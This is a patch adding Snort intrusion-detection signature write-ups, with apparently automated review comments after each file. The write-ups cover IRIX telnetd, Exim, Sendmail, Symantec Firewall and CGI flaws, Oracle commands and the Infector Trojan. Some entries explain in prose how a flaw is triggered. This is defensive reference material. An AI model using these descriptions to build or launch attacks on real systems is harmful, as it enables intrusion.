@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+711
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw in SGI IRIX's telnetd.
+
+--
+Impact:
+Serious. Arbitrary code execution. Possible remote root compromise of 
+the host.
+
+--
+Detailed Information:
+When setting one of the _RDL environment variables, IRIX's telnetd logs 
+the information via syslog. When telnetd calls syslog, it is possible to
+manipulate the variable to overwrite values on the stack so that code 
+given is executed as the user telnetd is run as, typically root.
+
+--
+Affected Systems:
+	SGI IRIX versions 6.2 to 6.5.8
+	SGI IRIX versions 5.2 to 6.1 with patches 1010 and 1020. 
+
+--
+Attack Scenarios:
+An attacker can gain a root shell with this attack.
+
+--
+Ease of Attack:
+Simple. Exploit code exisits and is readily available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply patch from SGI.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS304
+
+Bugtraq:
+http://www.securityfocus.com/bid/1572
+
+--
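Review bot: typo in Ease of Attack: "Simple. Exploit code exisits and is readily available." should read "exists". The separator before Additional References is "-- " with a trailing space while every other separator in the file is "--"; trim it so the section layout stays uniform.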
--- /dev/null
+++ b/doc/signatures/2563.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2563
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the Symantec Firewall.
+
+--
+Impact:
+A successful attack may cause a heap overflow, permitting the execution
+of arbitrary code on the vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability in the way the Symantec Firewall handles NetBIOS
+Name Service response packets.  If an attacker crafts a malicious UDP NetBIOS
+Name Service unsolicited response to a vulnerable Symantec Firewall that does
+not block port 137, it is possible to cause a heap overflow and execute
+abitrary code with kernel privileges.  The vulnerability exists because of
+improper validation of the existence of required fields for the NetBIOS name
+returned.  The default configuration does not allow UDP port 137 traffic and
+should not be exploitable if UDP port 137 is blocked.
+
+--
+Affected Systems:
+Symantec Norton Internet Security and Professional 2002,2003,2004
+Symantec Norton Personal Firewall 2002,2003,2004
+Symantec Norton AntiSpam 2004
+Symantec Client Firewall 5.01, 5.1.1
+Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
+
+--
+Attack Scenarios:
+An attacker can craft a malicious UDP NetBIOS Name Service response,
+possibly causing a heap overflow and the subsequent execution of
+arbitrary code with kernel privileges on an exploitable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0444
+
+Bugtraq:
+http://www.securityfocus.com/bid/10335
+
+Misc:
+http://www.eeye.com/html/Research/Advisories/AD20040512C.html
+
+--
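Review bot: typo in Detailed Information: "abitrary code with kernel privileges" should read "arbitrary". The "Additional References" heading is missing its trailing colon ("Additional References:" is the form used in the other signature files), and the Affected Systems entries "2002,2003,2004" want spaces after the commas.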
--- /dev/null
+++ b/doc/signatures/2591.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2591
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
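Review bot: the "Additional References" heading is missing its trailing colon, and the False Negatives block ("None known.") runs straight into the "--" separator without the blank line every other section in this file has; keep both consistent with the rest of the patch. Detailed Information says the overflow is reachable only "if Exim is configured to verify header syntax in the e-mail message body"; naming the Exim configuration option in question would let an administrator check whether the non-default setting is enabled rather than guess at it.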
--- /dev/null
+++ b/doc/signatures/1034.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1034
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
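Review bot: neither the Summary nor Detailed Information says what this rule matches: "exploit a known vulnerability in a web server running Microsoft Internet Information Server" and "the attack scenarios are legion" describe the platform, not the signature, so an analyst cannot tell from this file which request triggered Sid 1034. Add one sentence naming the URI or content the rule looks for, and fill the empty Additional References section with the vendor advisory for that issue. Also "arbitrary code of the attackers choosing" needs the possessive "attacker's".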
--- /dev/null
+++ b/doc/signatures/100000752.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000752
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "contact.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "contact.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
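Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials...") is generic credential-validation text that has nothing to do with the remote file include through "qb_path" in "contact.php"; drop it or replace it with what the rule actually looks for, and fix the typo "ona". In the Summary, "an exploitation attempt has been attempted" is redundant; "an exploitation attempt has been made" reads better. The two blank lines before "Rule:" and the missing blank line after the Sid value differ from the layout of the other files.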
--- /dev/null
+++ b/doc/signatures/1682.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1682
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
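Review bot: the Attack Scenarios section answers the wrong question: "Simple. These are Oracle database commands." is an ease-of-attack statement, and the section should instead describe how a command would reach the server (for instance over a session obtained through the network exploit that Detailed Information mentions). Detailed Information also says "This connection can either be a legitimate telnet connection", which does not fit an Oracle listener; say "legitimate database connection" or drop the sentence. Neither the Summary nor Detailed Information names the command this Sid matches, which is the first thing the reader of a per-Sid file needs. The Corrective Action line "investigate the server for signs of compromise" is missing its period, and several separators are "-- " with trailing whitespace.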
--- /dev/null
+++ b/doc/signatures/1177.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1177
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
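Review bot: same gap as 1034.txt: nothing in the Summary ("a known vulnerability on a web server or a web application") or Detailed Information says which request or content Sid 1177 matches, and Additional References is empty. One sentence identifying the matched URI or content string, plus the relevant advisory link, would make this file usable for triage. Minor: "arbitrary code of the attackers choosing" should be "attacker's", and "Web server" and "web server" are capitalised inconsistently within the same section.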
--- /dev/null
+++ b/doc/signatures/100000663.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000663
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "icq" parameter in the "edit.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
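Review bot: Impact overstates what the rest of the file describes. It claims "system integrity compromise" and "execution of arbitrary code", while Attack Scenarios says the attacker "can supply a malicious link designed to steal information from a user clicking on that link", which is the consequence of a reflected cross-site scripting bug in the "icq" parameter of "edit.php". Scope Impact to disclosure of the victim user's session or data, and add to Corrective Action that the application should encode the "icq" value before echoing it, alongside the existing patch advice. Also "attackers choosing" wants the possessive, and a blank line after the Sid value would match the other files.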
--- /dev/null
+++ b/doc/signatures/100000769.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000769
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "member" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "member" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
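Review bot: the third paragraph of Detailed Information ("...gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials...") is the same credential-validation boilerplate pasted into the other CGI files and does not describe SQL injection through the "member" parameter of "index.php"; drop it and fix "ona". The second paragraph is a comma splice: split "...compromise the database backend for the application, the attacker may also be able to execute system binaries..." into two sentences. In the Summary, "an exploitation attempt has been attempted" should be "has been made". Corrective Action could add that the application should use parameterised queries or validate "member" before it reaches the database, which is the mitigation the Attack Scenarios paragraph implies.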
--- /dev/null
+++ b/doc/signatures/851.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+851
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
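Review bot: typo in Detailed Information, "running ona web server" should be "on a", and "malicious code of the attackers choosing" needs the possessive. The line "relationships between the victim server and other hosts can be exploited by the attacker." is wrapped far longer than the rest of the file; rewrap it at the same width. As with 1034.txt and 1177.txt, the Summary ("a known vulnerability in a CGI web application") never says which script or request the rule matches, and Additional References is empty.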
--- /dev/null
+++ b/doc/signatures/1679.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1679
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
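Review bot: this file is a verbatim copy of 1682.txt apart from the Sid line, including the mislabelled Attack Scenarios ("Simple. These are Oracle database commands."), the "legitimate telnet connection" sentence and the missing period in Corrective Action. Two Sids normally match two different commands, so at minimum the Summary or Detailed Information of each file should name the command it detects; otherwise the reader has no way to tell 1679 from 1682.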
--- /dev/null
+++ b/doc/signatures/117.txt
@@ -0,0 +1,112 @@
+Rule:
+
+--
+Sid:
+117
+
+--
+Summary:
+Infector is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Infector sever to
+programs normally started on boot. Due to the nature of this Trojan it 
+is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	117	Infector 1.x
+	120	Infector 1.6 Server to Client
+	121	Infector 1.6 Client to Server Connection Request
+
+This Trojan is commonly used to install other Trojan programs.
+
+The Trojan also makes changes to the system registry and win.ini file.
+
+Notification of an active server is achieved via IRC or ICQ.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Apxil32.exe a backup 
+copy is made and usually named D3x32.drv.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added are:
+
+	apxil32 = apxil32.exe
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Apxil32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected 
+machine is recommended.
+
+A change is also made to the win.ini file, the line run=apxil32.exe 
+apxil32.exe is added and should be deleted.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS315
+http://www.whitehats.com/info/IDS502
+http://www.whitehats.com/info/IDS503
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/infector.htm
+
+Megasecurity:
+http://www.megasecurity.org/trojans/i/infector/Infector_all.html
+
+Simovits:
+http://www.simovits.com/trojans/tr_data/y1627.html
+
+--
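Review bot: the Summary "Infector is a Trojan Horse." does not say what the rule detects; the SID table in Detailed Information ("117 Infector 1.x", "120 Infector 1.6 Server to Client", "121 Infector 1.6 Client to Server Connection Request") suggests this Sid matches generic Infector 1.x traffic, and one sentence saying so would help. The file also has no Affected Systems section; the OS list (Windows 95/98/ME) sits under Detailed Information and should move to its own "Affected Systems:" block like the other files. The server path and backup filename ("Apxil32.exe", "D3x32.drv") belong in Detailed Information rather than Ease of Attack. Under Corrective Action, "Registry keys added are: apxil32 = apxil32.exe" is a value under the Run and RunServices keys listed just above it, not a key; say "value" so an administrator looks in the right place. Typos: "Infector sever" should be "server", and the Impact phrase "execution of files and reboot the targeted machine" should be "rebooting of".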
--- /dev/null
+++ b/doc/signatures/578.txt
@@ -0,0 +1,60 @@
+Rule:
+
+Sid:
+578
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) cmsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port cmsd is using.  Attackers can also learn what versions of the cmsd protocol are accepted by cmsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as cmsd run.  The cmsd RPC service implements the Calendar Manager Service daemon that is often distributed with the Common Desktop Environment (CDE) and OpenWindows.  Several buffer overflow vulnerabilities have been associated with cmsd.
+
+--
+Affected Systems:
+Any host running the RPC service cmsd.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where cmsd runs.  This may be a precursor to accessing cmsd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access cmsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for cmsd, not probes of the cmsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the cmsd service itself. An attacker may attempt to go directly to the cmsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS17
+
+
+--
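Review bot: the "--" separator between "Rule:" and "Sid:" is missing at the top of this file, unlike every other signature file in the patch; add it so the section layout stays uniform. The content otherwise reads well; the False Negatives paragraph explaining that a direct connection to the cmsd port bypasses the portmapper query is exactly the caveat a reader of this rule wants.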
--- /dev/null
+++ b/doc/signatures/2412.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid:
+2412
+
+--
+Summary:
+This event is generated when a cross-site scripting attempt using
+RealNetworks RealPlayer has been successful.
+
+--
+Impact:
+Cross site scripting, information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in versions of RealPlayer from RealNetworks that
+may allow a remote attacker to launch a sucessful cross-site scripting
+attack against a host running the application.
+
+This event is indicative of a successful attack.
+
+--
+Affected Systems:
+	RealNetworks RealPlayer
+	
+--
+Attack Scenarios:
+An attacker can supply a malformed file to the client making the request
+and use the vulnerability to gain sensitive information from the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
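Review bot: typo in Detailed Information, "sucessful cross-site scripting" should be "successful". Affected Systems lists only "RealNetworks RealPlayer" while the text speaks of "versions of RealPlayer", so state which versions, and Additional References is empty for a vendor-specific vulnerability; add the vendor advisory. Since the Summary says the rule fires when the attempt "has been successful", Detailed Information should say what in the observed traffic indicates success; without that the reader cannot judge the severity of an alert.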
--- /dev/null
+++ b/doc/signatures/2183.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2183
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in certain versions of Sendmail.
+
+--
+Impact:
+Denial of Service (DoS), possible arbitrary code execution and the 
+remote attacker can gain access to a machine with the credentials of
+the user running the Sendmail daemon, usually 'root'.
+
+--
+Detailed Information:
+A vulnerability exists in the Sendmail MTA Daemon that could allow an
+attacker the opportunity to gain root access.
+
+A programming error exists such that a buffer overflow can be caused
+using the header fields in an SMTP session. The prescan() function does 
+not properly handle certain conversions from character and integer 
+types. This can cause Sendmail to interpret the value as a special 
+control value (NOCHAR).
+
+This rule detects specific exploit code attacks against a server using 
+Sendmail.
+
+--
+Affected Systems:
+	Sendmail Pro (all versions)
+	Sendmail Switch 2.1 prior to 2.1.6
+	Sendmail Switch 2.2 prior to 2.2.6
+	Sendmail Switch 3.0 prior to 3.0.4
+	Sendmail for NT 2.X prior to 2.6.3
+	Sendmail for NT 3.0 prior to 3.0.4
+	Systems running open-source sendmail versions prior to 8.12.9, including UNIX and Linux systems
+
+--
+Attack Scenarios:
+The attacker merely needs to execute one of the available exploit 
+scripts.
+
+--
+Ease of Attack:
+Simple. Exploits for this vulnerability exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+
+--
+Additional References:
+
+--
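Review bot: Contributors and Additional References are both empty, although Detailed Information describes a specific, well-documented bug (the prescan() character-to-integer conversion that yields NOCHAR) and Affected Systems lists exact fixed versions; at least the vendor advisory and the matching CVE or Bugtraq entry should be listed so an analyst can confirm the fix level. Corrective Action "Upgrade to the latest version of the software." could point at the 8.12.9 threshold already given in Affected Systems.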
--- /dev/null
+++ b/doc/signatures/1793.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1793
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "fetish".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "fetish".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
